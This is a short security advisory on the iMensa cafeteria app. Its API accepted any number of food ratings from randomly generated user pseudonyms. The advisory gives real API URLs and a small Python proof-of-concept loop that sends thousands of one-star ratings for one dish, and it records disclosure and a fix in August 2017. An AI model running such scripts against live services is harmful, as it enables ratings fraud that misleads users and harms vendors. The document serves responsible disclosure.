SIK-2017-019

Title:

iMensa food ratings manipulable

Report ID

SIK-2017-019

Summary:

Vendor: Intelligent Systems GmbH
Product: iMensa
Affected Version: Any versions
Severity: Ratings can be manipulated. Possibly influences how many people visit the cantina.
Short summary: Food can be rated many times with a simple http request

Details:

All dishes for a cantina can be found here:

http://app.imensa.de/api/1.10.8/de.imensa.app.ios/.json
example for HDA Schoefferstrasse: dar3
http://app.imensa.de/api/1.10.8/de.imensa.app.ios/dar3.json

Dishes can be rated with a simple http request containing number of stars, dish id and a user id that can be randomly generated.

An example python script that rates a dish with 1 star many times:

for i in range(3100,9999):
    data = '{"refectory":"dar3","day":"2017-06-02","meal":"1198990","stars":1,"pseudonym":"593087636c'+ str(i) + '.36194932"}'
    print urllib2.urlopen("http://app.imensa.de/api/1.10.8/de.imensa.app.ios/rate.json",data).read()

Workaround

None available.

Suggested Mitigation

If you don’t wish to receive fake ratings, make use of a proper authentication mechanism. Captchas might also be an option for prohibiting mass-fake ratings.

Timeline

2017-08-09: found vulnerability
2017-08-09: Contacted Developer
2017-08-10: Sent advisory to developer
2017-08-18: Vulnerability fixed